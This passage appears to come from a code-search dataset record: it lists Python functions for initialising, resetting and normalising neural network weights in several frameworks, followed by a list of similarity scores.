check if the current module has reset_parameters & if it's callabed called it on m\n reset_parameters = getattr(m, \"reset_parameters\", None)\n if callable(reset_parameters):\n m.reset_parameters()\n\n # Applies fn recursively to every submodule see: https://pytorch.org/docs/stable/generated/torch.nn.Module.html\n model.apply(fn=weight_reset)", "def update_layers(self):\n\n # Para cada layer atualiza utilizando o gradiente descendente e o learning rate\n for layer in self.layers:\n layer.update_layer(self.learning_rate)", "def weights_init(mod):\n classname = mod.__class__.__name__\n if classname.find('Conv') != -1:\n mod.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n mod.weight.data.normal_(1.0, 0.02)\n mod.bias.data.fill_(0)", "def init_weights(self):\n\n params = torch.load(self.resnet_weight)\n\n self.fc1.weight.data = params['state_dict']['module.fc.weight'].clone()\n self.fc1.bias.data = params['state_dict']['module.fc.bias'].clone()\n\n\n r = np.sqrt(1.) / np.sqrt(self.fc3.in_features +\n self.fc3.out_features)\n self.fc3.weight.data.uniform_(-r, r)\n self.fc3.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc2.in_features +\n self.fc2.out_features)\n self.fc2.weight.data.uniform_(-r, r)\n self.fc2.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc4.in_features +\n self.fc4.out_features)\n self.fc4.weight.data.uniform_(-r, r)\n self.fc4.bias.data.fill_(0)", "def spectral_norm_parallel(self):\n weights = {}\n for l in self.all_conv_layers:\n weight = l.weight_normalized\n weight_mat = weight.view(weight.size(0), -1)\n if weight_mat.shape not in weights:\n weights[weight_mat.shape] = []\n weights[weight_mat.shape].append(weight_mat)\n loss = 0\n for i in weights:\n weights[i] = torch.stack(weights[i], dim=0)\n with torch.no_grad():\n num_iter = self.num_power_iter\n if i not in self.sr_u:\n num_w, row, col = weights[i].shape\n self.sr_u[i] = F.normalize(torch.ones(num_w, row).normal_(0, 1), dim=1, eps=0.001)\n self.sr_v[i] = F.normalize(torch.ones(num_w, col).normal_(0, 1), dim=1, eps=0.001)\n num_iter = 10 * self.num_power_iter\n for j in range(num_iter):\n self.sr_v[i] = F.normalize(torch.matmul(self.sr_u[i].unsqueeze(1), weights[i]).squeeze(1), dim=1, eps=0.001)\n self.sr_u[i] = F.normalize(torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)).squeeze(2), dim=1, eps=0.001)\n sigma = torch.matmul(self.sr_u[i].unsqueeze(1), torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)))\n loss += torch.sum(sigma)\n return loss", "def normalize_weight(self, Z):\n self.weight /= Z", "def init_weights(self):\n for i in range(5):\n default_init_weights(getattr(self, f'conv{i+1}'), 0.1)", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def update_weights(self):\n activation, activation_p = self.feedforward()\n # initialize delta_weights\n delta_w = np.zeros(2)\n # simultaneous calculate delta_weights\n for i, element in enumerate(self.y):\n delta_w += (activation[i]-element)*(activation_p[i])*self.X[i]\n # update weight\n self.weights -= self.alfa*delta_w", "def normalise(self):\n total = 0\n for feat_set in self.values():\n for value in feat_set.values():\n total += value\n norm = 1/total\n for feat_set in self.values():\n for feat in feat_set:\n feat_set[feat] *= norm\n return self", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return 
array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def initialize_weights(self):\n tf.nest.map_structure(\n weights_initializer.WeightsInitializer.initialize_layer_or_model,\n self._layer_nest)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=math.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def normalise(self):\n s = self._sum()\n if s != 0:\n for element, value in self.focals.items():\n self.focals[element] /= s", "def weights_init(m):\n if (\n isinstance(m, nn.Linear)\n or isinstance(m, nn.EmbeddingBag)\n or isinstance(m, nn.Embedding)\n or isinstance(m, SparseLinear)\n ):\n nn.init.xavier_normal_(m.weight)", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def init_weights(self) -> None:\n nn.init.kaiming_normal_(self._U)\n nn.init.kaiming_normal_(self._W)\n nn.init.kaiming_normal_(self._V)\n\n nn.init.normal_(self._b)", "def reset_model(model):\n\n\tfor layer in model.layers:\n\t\t# Note: these are custom depending on the layer type\n\t\tif '.MoleculeConv' in str(layer):\n\t\t\tW_inner = layer.init_inner((layer.inner_dim, layer.inner_dim))\n\t\t\tb_inner = np.zeros((1, layer.inner_dim))\n\t\t\t# Inner weights\n\t\t\tlayer.W_inner.set_value((T.tile(W_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, layer.inner_dim, layer.inner_dim)).eval()).astype(np.float32))\n\t\t\tlayer.b_inner.set_value((T.tile(b_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, 1, layer.inner_dim)).eval()).astype(np.float32))\n\n\t\t\t# Outer weights\n\t\t\tW_output = layer.init_output((layer.inner_dim, layer.units), scale = layer.scale_output)\n\t\t\tb_output = np.zeros((1, layer.units))\n\t\t\t# Initialize weights tensor\n\t\t\tlayer.W_output.set_value((T.tile(W_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlayer.b_output.set_value((T.tile(b_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlogging.info('graphFP layer reset')\n\n\t\telif '.Dense' in str(layer):\n\t\t\tlayer.W.set_value((layer.init(layer.W.shape.eval()).eval()).astype(np.float32))\n\t\t\tlayer.b.set_value(np.zeros(layer.b.shape.eval(), dtype=np.float32))\n\t\t\tlogging.info('dense layer reset')\n\n\t\telif '.Dropout' in 
str(layer):\n\t\t\tlogging.info('dropout unchanged')\n\t\telse:\n\t\t\traise ValueError('Unknown layer {}, cannot reset weights'.format(str(layer)))\n\tlogging.info('Reset model weights')\n\treturn model", "def normalization(channels):\n return GroupNorm32(32, channels)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=np.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def forward_propagate(self):\n for i in range(0, len(self.output_layer)):\n output = 0\n\n # Loop through each Neuron in the hidden layer\n for neuron in self.hidden_layer:\n output += neuron.weights[i] * neuron.output\n\n # Update summation for output classifier\n self.output_layer[i] = output", "def weights_init_normal(m):\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0.0, 0.02)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n m.weight.data.normal_(1.0, 0.02)\r\n m.bias.data.fill_(0)", "def model_normalize_(self, ref_point: 'ModelParameters', order=2):\n for parameter in self.parameters:\n parameter *= (ref_point.model_norm(order) / self.model_norm())", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def apply_weights(self):\n return self.X.dot(self.get_weights())", "def extract_weights(self, name):\n\n # Extract weights\n weight_layer = (self.merged_model).get_layer(name)\n weights = weight_layer.get_weights()[0]\n\n # Normalize\n # weights = weights / np.linalg.norm(weights, axis = 1).reshape((-1, 1))\n return weights", "def normalize_all(self):\n #for i, vector in enumerate(self.real_vectors):\n # self.real_vectors[i] /= np.linalg.norm(vector)\n self.vectors /= np.linalg.norm(self.vectors, axis=1).reshape(-1,1)\n for i, vector in enumerate(self.real_vectors):\n vector.set(self.vectors[i])", "def normalize_weights(self, labels, weights):\n if self._ragged:\n labels, _, weights, _ = utils.ragged_to_dense(labels, None, weights)\n return self._normalize_weights_impl(labels, weights)", "def normalizeWeights(self):\n\n\t\t# Normalizing crossover and mutation handler weights, result is a CDF\n\t\ttotal = sum(self.mutation_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.mutation_handlers_weights)):\n\t\t\tcumsum += self.mutation_handlers_weights[i]\n\t\t\tself.mutation_handlers_weights[i] = cumsum/total\n\t\ttotal = sum(self.crossover_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.crossover_handlers_weights)):\n\t\t\tcumsum += self.crossover_handlers_weights[i]\n\t\t\tself.crossover_handlers_weights[i] = cumsum/total", "def update_network(self, a, batch_size):\n for layer in self.layers:\n layer.weights_update(a, self.alpha, self.l2_lambda, batch_size)\n a = layer.a", "def init_weights(self):\n # 
Initialize weights\n self.apply(self._init_weights)", "def remove_norms(model: \"SqueezeWave\") -> \"SqueezeWave\":\n squeeze_wave = model\n for i, wn_layer in enumerate(squeeze_wave.wn_layers):\n squeeze_wave.wn_layers[i] = WN.remove_norms(wn_layer)\n return squeeze_wave", "def apply_batch_normalization(self, layer):\n if type(layer) is not BatchNormalization:\n raise ValueError('The `layer` must be neoml.Dnn.BatchNormalization.')\n\n self._internal.apply_batch_normalization(layer._internal)", "def normalize(w: torch.Tensor):\n\n if w.dim() > 1:\n return _matrix(w)\n\n return _vector(w)", "def init_weights(self, leveledinit: bool, kernel_size: int, bias: bool) -> None:\n if leveledinit:\n nn.init.normal_(self.conv1d.weight, std=1e-3)\n nn.init.normal_(self.conv1d.bias, std=1e-6)\n with torch.no_grad():\n self.conv1d.weight[:, 0, :] += 1.0 / kernel_size\n else:\n nn.init.xavier_uniform_(self.conv1d.weight)\n\n if self.embed in (\"pre\", \"post\"):\n nn.init.xavier_uniform_(self.embedding.weight)", "def normalize_layer(tensor, name, norm_use='bn'):\n if norm_use == \"gn\":\n x = GroupNorm(name=name + 'gn', groups=32)(tensor)\n elif norm_use == \"bn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'bn', epsilon=1.001e-5)(tensor)\n elif norm_use == \"rbn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'rbn', epsilon=1.001e-5, renorm=True)(tensor)\n elif norm_use == \"in\":\n x = InstanceNormalization(axis=-1, name=name + 'in')(tensor)\n else:\n x = tensor\n return x", "def _initialize_weights(self):\n for _, cell in self.cells_and_names():\n if isinstance(cell, nn.Conv2d):\n cell.weight.set_data(orthogonal(cell.weight.shape, 0.6))\n if cell.bias is not None:\n cell.bias.set_data(\n init.initializer(init.Constant(0.01), cell.bias.shape,\n cell.bias.dtype))", "def reset_weights(self):\n self.policy_backbone.reset_weights()\n self.value_backbone.reset_weights()\n self.action_head.reset_weights()\n self.critic_head.reset_weights()", "def init_weights(m: Union[torch.nn.Conv3d, torch.nn.BatchNorm3d]) -> None:\n import torch\n if isinstance(m, torch.nn.Conv3d):\n torch.nn.init.normal_(m.weight, 0, 0.01)\n elif isinstance(m, torch.nn.BatchNorm3d):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)", "def _init_layers(self) -> None:\n self.self_attn = MultiheadAttention(**self.self_attn_cfg)\n self.cross_attn = MultiheadAttention(**self.cross_attn_cfg)\n self.embed_dims = self.self_attn.embed_dims\n self.ffn = FFN(**self.ffn_cfg)\n norms_list = [\n build_norm_layer(self.norm_cfg, self.embed_dims)[1]\n for _ in range(3)\n ]\n self.norms = ModuleList(norms_list)" ]
[ "0.7143955", "0.7143955", "0.7143955", "0.71335757", "0.7069364", "0.7069364", "0.70534694", "0.7049442", "0.70303166", "0.6807604", "0.6779128", "0.6764302", "0.67596924", "0.6736109", "0.6710482", "0.66960436", "0.6584008", "0.6554928", "0.6526808", "0.65179425", "0.65166473", "0.6464522", "0.64566517", "0.6440153", "0.6430107", "0.64231014", "0.6402119", "0.6390117", "0.6374696", "0.6365841", "0.6364822", "0.6355938", "0.634237", "0.63393766", "0.6339081", "0.63101", "0.62984", "0.62978876", "0.62978876", "0.62978506", "0.6286966", "0.62779987", "0.6273961", "0.6270426", "0.62676316", "0.62653995", "0.6218249", "0.61947995", "0.61873454", "0.6181009", "0.6133146", "0.6123111", "0.6122635", "0.61212605", "0.61159825", "0.6097101", "0.60863924", "0.60686415", "0.6063407", "0.60578144", "0.60414445", "0.6031333", "0.6014542", "0.60114884", "0.6010666", "0.6007938", "0.6007938", "0.60051227", "0.59904414", "0.5984486", "0.5977653", "0.5967083", "0.5967083", "0.595422", "0.595331", "0.59511894", "0.59511876", "0.59488463", "0.59434247", "0.5940112", "0.5939761", "0.5939761", "0.5938668", "0.59362733", "0.5908928", "0.5902466", "0.5901212", "0.5899774", "0.5889168", "0.5887764", "0.58847934", "0.5882299", "0.58733845", "0.58728945", "0.58614886", "0.5859203", "0.5856755", "0.58557904" ]
0.73184675
1
Register stats for denormalization as buffer.
def register_stats(self, stats): assert stats.endswith(".h5") or stats.endswith(".npy") if stats.endswith(".h5"): mean = read_hdf5(stats, "mean").reshape(-1) scale = read_hdf5(stats, "scale").reshape(-1) else: mean = np.load(stats)[0].reshape(-1) scale = np.load(stats)[1].reshape(-1) self.register_buffer("mean", torch.from_numpy(mean).float()) self.register_buffer("scale", torch.from_numpy(scale).float()) logging.info("Successfully registered stats as buffer.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _cast_buffers(self,\n dtype: Optional[torch.dtype] = None,\n memo: Optional[Set] = None) -> None:\n if memo is None:\n memo = set()\n for module in self.modules():\n if module is not self and isinstance(module, XlaFullyShardedDataParallel):\n # Allow any child FSDP instances to handle their own buffers.\n module._cast_buffers(dtype=dtype, memo=memo)\n elif module not in memo:\n memo.add(module)\n for name, buf in module.named_buffers(recurse=False):\n if buf is None:\n continue\n if torch.is_floating_point(buf):\n orig_dtype = buf.dtype\n cast_dtype = dtype or self.buffer_dtype\n if orig_dtype != cast_dtype:\n buf = buf.to(cast_dtype)\n buf._orig_dtype = orig_dtype\n if buf.device != self.xla_device:\n buf = buf.to(self.xla_device)\n setattr(module, name, buf)", "def add_memory(self, **kwarg):\n for name, obs in kwarg.items():\n self.buffers[name] = np.concatenate((self.buffers[name], obs), axis=0)\n # get recent memory\n return self", "def generate_statistics_in_memory(\n record_batch: pa.RecordBatch,\n options: stats_options.StatsOptions = stats_options.StatsOptions()\n) -> statistics_pb2.DatasetFeatureStatisticsList:\n stats_generators = cast(List[stats_generator.CombinerStatsGenerator],\n get_generators(options, in_memory=True))\n partial_stats = generate_partial_statistics_in_memory(record_batch, options,\n stats_generators)\n return extract_statistics_output(partial_stats, stats_generators)", "def create_buffers(self):", "def append_buffer(self, buffer):\n\n first_data_idx = self.data[0][-1] + 1 if self.__len__() > 0 else 0\n\n d0 = [first_data_idx + i for i, _ in enumerate(buffer.memory)] # indexes\n d1 = [b[0] for b in buffer.memory] # actions\n d2 = [b[1][0] for b in buffer.memory] # speeds\n d3 = [b[1][3] for b in buffer.memory] # images\n d4 = [b[3] or b[4] for b in buffer.memory] # eoes\n d5 = [b[2] for b in buffer.memory] # rewards\n d6 = [b[5] for b in buffer.memory] # infos\n d7 = [b[1][1] for b in buffer.memory] # gears\n d8 = [b[1][2] for b in buffer.memory] # rpms\n d9 = [b[3] for b in buffer.memory] # terminated\n d10 = [b[4] for b in buffer.memory] # truncated\n\n if self.__len__() > 0:\n self.data[0] += d0\n self.data[1] += d1\n self.data[2] += d2\n self.data[3] += d3\n self.data[4] += d4\n self.data[5] += d5\n self.data[6] += d6\n self.data[7] += d7\n self.data[8] += d8\n self.data[9] += d9\n self.data[10] += d10\n else:\n self.data.append(d0)\n self.data.append(d1)\n self.data.append(d2)\n self.data.append(d3)\n self.data.append(d4)\n self.data.append(d5)\n self.data.append(d6)\n self.data.append(d7)\n self.data.append(d8)\n self.data.append(d9)\n self.data.append(d10)\n\n to_trim = self.__len__() - self.memory_size\n if to_trim > 0:\n self.data[0] = self.data[0][to_trim:]\n self.data[1] = self.data[1][to_trim:]\n self.data[2] = self.data[2][to_trim:]\n self.data[3] = self.data[3][to_trim:]\n self.data[4] = self.data[4][to_trim:]\n self.data[5] = self.data[5][to_trim:]\n self.data[6] = self.data[6][to_trim:]\n self.data[7] = self.data[7][to_trim:]\n self.data[8] = self.data[8][to_trim:]\n self.data[9] = self.data[9][to_trim:]\n self.data[10] = self.data[10][to_trim:]\n\n return self", "def append_buffer(self, buffer):\n\n first_data_idx = self.data[0][-1] + 1 if self.__len__() > 0 else 0\n\n d0 = [first_data_idx + i for i, _ in enumerate(buffer.memory)] # indexes\n d1 = [b[0] for b in buffer.memory] # actions\n d2 = [b[1][0] for b in buffer.memory] # speeds\n d3 = [b[1][2] for b in buffer.memory] # lidar\n d4 = [b[3] or b[4] for b in buffer.memory] # eoes\n d5 
= [b[2] for b in buffer.memory] # rewards\n d6 = [b[5] for b in buffer.memory] # infos\n d7 = [b[1][1] for b in buffer.memory] # progress\n d8 = [b[3] for b in buffer.memory] # terminated\n d9 = [b[4] for b in buffer.memory] # truncated\n\n if self.__len__() > 0:\n self.data[0] += d0\n self.data[1] += d1\n self.data[2] += d2\n self.data[3] += d3\n self.data[4] += d4\n self.data[5] += d5\n self.data[6] += d6\n self.data[7] += d7\n self.data[8] += d8\n self.data[9] += d9\n else:\n self.data.append(d0)\n self.data.append(d1)\n self.data.append(d2)\n self.data.append(d3)\n self.data.append(d4)\n self.data.append(d5)\n self.data.append(d6)\n self.data.append(d7)\n self.data.append(d8)\n self.data.append(d9)\n\n to_trim = self.__len__() - self.memory_size\n if to_trim > 0:\n self.data[0] = self.data[0][to_trim:]\n self.data[1] = self.data[1][to_trim:]\n self.data[2] = self.data[2][to_trim:]\n self.data[3] = self.data[3][to_trim:]\n self.data[4] = self.data[4][to_trim:]\n self.data[5] = self.data[5][to_trim:]\n self.data[6] = self.data[6][to_trim:]\n self.data[7] = self.data[7][to_trim:]\n self.data[8] = self.data[8][to_trim:]\n self.data[9] = self.data[9][to_trim:]\n\n return self", "def register_filters(self):\n n = 0\n # prepare for pytorch\n for k in self.phi_f.keys():\n if type(k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n self.phi_f[k] = torch.from_numpy(\n self.phi_f[k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), self.phi_f[k])\n n += 1\n for psi_f in self.psi1_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n psi_f[sub_k] = torch.from_numpy(\n psi_f[sub_k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), psi_f[sub_k])\n n += 1\n for psi_f in self.psi2_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n psi_f[sub_k] = torch.from_numpy(\n psi_f[sub_k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), psi_f[sub_k])\n n += 1", "def __init__(self, T, B, N):\n\n super().__init__()\n self.register_buffer('weight', torch.ones(T, B))\n self.register_buffer('target_output_prob', torch.zeros(T, B))\n self.register_buffer('target_output_entropy', torch.zeros(T, B))\n self.register_buffer('target_output_grad_logits', torch.zeros(T, B, N))\n self.register_buffer('target_output_grad_prob', torch.zeros(T, B, N))\n self.register_buffer('target_output_grad_entropy', torch.zeros(T, B, N))\n self.register_buffer('behaviour_output_prob', torch.zeros(T, B))\n self.register_buffer('importance_weights', torch.zeros(T, B))\n self.register_buffer('returns', torch.zeros(T, B))\n self.register_buffer('advantages', torch.zeros(T, B))\n self.register_buffer('pg_loss', torch.zeros(1))\n self.register_buffer('value_loss', torch.zeros(1))\n self.register_buffer('entropy_loss', torch.zeros(1))\n self.register_buffer('grad_value', torch.zeros(T + 1, B))\n self.register_buffer('grad_target_output', torch.zeros(T, B, N))", "def register_extra_weights(self):\n device = self.weight.device\n\n # Initialize and register the learned parameters 'a' (SCALE) and 'b' (OFFSET)\n # for calculating alpha as a function of context size.\n a = torch.Tensor([0.0]).to(device)\n b = torch.Tensor([0.0]).to(device)\n self.register_parameter(name='a', param=torch.nn.Parameter(a, requires_grad=True))\n self.register_parameter(name='b', param=torch.nn.Parameter(b, requires_grad=True))\n\n # Variables to store the context moments to use for normalizing the target.\n 
self.register_buffer(name='batch_mean',\n tensor=torch.zeros((1, self.num_features, 1, 1), requires_grad=True, device=device))\n self.register_buffer(name='batch_var',\n tensor=torch.ones((1, self.num_features, 1, 1), requires_grad=True, device=device))\n\n # Variable to save the context size.\n self.register_buffer(name='context_size',\n tensor=torch.zeros((1), requires_grad=False, device=device))", "def __init__(self, aggregation_depth, include_bytes=True):\n\n self._prev_stats = {}\n self._aggregation_depth = aggregation_depth\n self._include_bytes = include_bytes\n\n self.init_cur_stats()", "def set_batch_stats(self, x):\n\n if self.set_stats_f is None:\n self.set_stats_f = theano.function(\n inputs=[self.input],\n updates=[(self.bm, self.m), (self.bv, self.v)]\n )\n\n self.set_stats_f(x.astype(dtype))", "def _setup_stats(self) -> None:\n\n # Save statistics\n self.mass = np.array([0])\n self.mass_balance = np.array([0])\n self.mass_balance_trend = np.array([0])", "def _cast_buffers(\n self,\n device: Optional[torch.device] = None,\n dtype: Optional[Dict[str, torch.dtype]] = None,\n memo: Optional[Set] = None,\n recurse: bool = True,\n ) -> None:\n if memo is None:\n memo = set()\n for module in self.modules():\n if module is not self and isinstance(module, FullyShardedDataParallel) and recurse:\n # Allow any child FSDP instances to handle their own buffers.\n module._cast_buffers(device=device, dtype=dtype, memo=memo, recurse=recurse)\n elif module not in memo:\n memo.add(module)\n for name, buf in module.named_buffers(recurse=False):\n if buf is None:\n continue\n buf = buf.to(device=device or self.compute_device)\n if name not in self._buffer_name_to_orig_dtype:\n self._buffer_name_to_orig_dtype[name] = buf.dtype\n # If given, cast buffer to the given dtype. 
This is used to\n # suppport mixed precision for buffers\n # (given by self.mixed_precision.buffer_dtype) and also used\n # to restore the buffer dtype to the original precision for\n # state_dict() calls.\n # Note that non-floating point buffers are not casted.\n if torch.is_floating_point(buf):\n # We are restoring the original buffer type in\n # preparation for checkpoint.\n if dtype:\n buf = buf.to(dtype=dtype[name])\n # Note that we don't pass in self.mixed_precision.buffer_dtype\n # recursively into _cast_buffers, as we want to respect\n # mp config for child FSDP instances.\n elif self._mixed_precision_enabled_for_buffers():\n buf = buf.to(self.mixed_precision.buffer_dtype)\n\n setattr(module, name, buf)", "def Buffer(self) -> _n_0_t_7[_n_0_t_6]:", "def Buffer(self) -> _n_0_t_7[_n_0_t_6]:", "def Buffer(self) -> _n_0_t_7[_n_0_t_6]:", "def fillBuffer():\n buff[bufferCounter].next = dataIn", "def stats(self, stats):\n self._stats = stats", "def _writeBuffers(self):\r\n\r\n logger.info('Writing buffers to disk...')\r\n\r\n for ds in self.datasets.keys():\r\n\r\n if len(self.datasetBuffer[ds]) > 0:\r\n\r\n # write the buffers to disk\r\n self._writeBuffer(self.datasets[ds], ds, self.datasetBuffer[ds])\r\n\r\n # increment the indexes\r\n self.idxs[ds] += len(self.datasetBuffer[ds])\r\n\r\n # Reset the buffers and feature counts\r\n self.datasetBuffer[ds] = []\r\n\r\n self.totalFeatures = 0", "def _add_buffer(self, p_buffer_element:PyTorchIOElement):\r\n\r\n self._buffer.add_element(p_buffer_element)", "def _flush_stats(self, train=True):\n\t\tif train:\n\t\t\tself.train_accuracy.flush_buffer()\n\t\t\tself.train_epochs.flush_buffer()\n\t\t\tself.train_loss.flush_buffer()\n\t\t\tself.train_confusion_matrix.flush_buffer()\n\t\t\tself.learning_rate.flush_buffer()\n\t\telse:\n\t\t\tself.val_accuracy.flush_buffer()\n\t\t\tself.val_epochs.flush_buffer()\n\t\t\tself.val_loss.flush_buffer()\n\t\t\tself.val_confusion_matrix.flush_buffer()\n\n\t\tif self.plot:\n\t\t\tself._plot(train=train)", "def append_buffer(self, buffer):\n\n first_data_idx = self.data[0][-1] + 1 if self.__len__() > 0 else 0\n\n d0 = [first_data_idx + i for i, _ in enumerate(buffer.memory)] # indexes\n d1 = [b[0] for b in buffer.memory] # actions\n d2 = [b[1][0] for b in buffer.memory] # speeds\n d3 = [b[1][1] for b in buffer.memory] # lidar\n d4 = [b[3] or b[4] for b in buffer.memory] # eoes (terminated or truncated)\n d5 = [b[2] for b in buffer.memory] # rewards\n d6 = [b[5] for b in buffer.memory] # infos\n d7 = [b[3] for b in buffer.memory] # terminated\n d8 = [b[4] for b in buffer.memory] # truncated\n\n if self.__len__() > 0:\n self.data[0] += d0\n self.data[1] += d1\n self.data[2] += d2\n self.data[3] += d3\n self.data[4] += d4\n self.data[5] += d5\n self.data[6] += d6\n self.data[7] += d7\n self.data[8] += d8\n else:\n self.data.append(d0)\n self.data.append(d1)\n self.data.append(d2)\n self.data.append(d3)\n self.data.append(d4)\n self.data.append(d5)\n self.data.append(d6)\n self.data.append(d7)\n self.data.append(d8)\n\n to_trim = self.__len__() - self.memory_size\n if to_trim > 0:\n self.data[0] = self.data[0][to_trim:]\n self.data[1] = self.data[1][to_trim:]\n self.data[2] = self.data[2][to_trim:]\n self.data[3] = self.data[3][to_trim:]\n self.data[4] = self.data[4][to_trim:]\n self.data[5] = self.data[5][to_trim:]\n self.data[6] = self.data[6][to_trim:]\n self.data[7] = self.data[7][to_trim:]\n self.data[8] = self.data[8][to_trim:]\n\n return self", "def __init__ (self, pipe, histogram_buffer) 
:\n\t\tBasicDevice.__init__(self, pipe)\n\t\t# saving the buffer where the spectrum will be saved\n\t\tself.buffer = histogram_buffer", "def stats(self, stats):\n\n self._stats = stats", "def _buffer_all(self):\n self._buffer()", "def set_scribe_buffer(buffer_enabled):\r\n LogOptions._SCRIBE_BUFFER = buffer_enabled", "def flush(self) -> None:\n super().put(self.buffer)\n self.buffer = np.ndarray((0, 1), dtype=np.int16)", "def add_stats(self):\n units = self.get_unit_map()\n for metric in self.raw_metrics:\n unit, metric_type = units.get(metric, (DEFAULT_UNIT, DEFAULT_TYPE))\n if metric_type == \"counter\":\n # Unit/Second\n unit = \"/\".join((unit, \"Second\"))\n self.add_derive_value(metric, unit, self.raw_metrics[metric], rate=True)\n else:\n self.add_gauge_value(metric, unit, self.raw_metrics[metric])", "def register_statistic(self, func=None, shape=(-1,)):\n if func is not None:\n return self.register_statistic()(func)\n\n def decorator(func):\n\n name = func.__name__\n\n def _wrapper(cluster):\n out = func(cluster)\n self.store.memory_store.store(cluster, **{name: out})\n\n # Add the statistics.\n stats = self.store.items['statistics']\n stats.add(name, _wrapper, shape)\n # Register it in the global cluster store.\n self.store.register_field(name, 'statistics')\n # Compute it on all existing clusters.\n stats.store_all(name=name, mode='force')\n info(\"Registered statistic `{}`.\".format(name))\n\n return decorator", "def fill_buffer(self, num_domains: int):\n if self._randomizer is None:\n raise pyrado.TypeErr(msg=\"The randomizer must not be None to call fill_buffer()!\")\n if not isinstance(num_domains, int) or num_domains < 0:\n raise pyrado.ValueErr(given=num_domains, g_constraint=\"0 (int)\")\n\n self._randomizer.randomize(num_domains)\n self._buffer = self._randomizer.get_params(-1, fmt=\"list\", dtype=\"numpy\")\n self._ring_idx = 0", "def register_process_statistics():\n if resource is None:\n log.warning(\n 'Unable to import resource module, memory diags not available'\n )\n return\n\n rusage_fields = [\n ('Execution time in user mode (seconds)', 'ru_utime'),\n ('Execution time in kernel mode (seconds)', 'ru_stime'),\n ('Maximum Resident Set Size (KB)', 'ru_maxrss'),\n ('Soft page faults', 'ru_minflt'),\n ('Hard page faults', 'ru_majflt'),\n ('Input events', 'ru_inblock'),\n ('Output events', 'ru_oublock'),\n ('Voluntary context switches', 'ru_nvcsw'),\n ('Involuntary context switches', 'ru_nivcsw'),\n ]\n\n def dump(log):\n process = 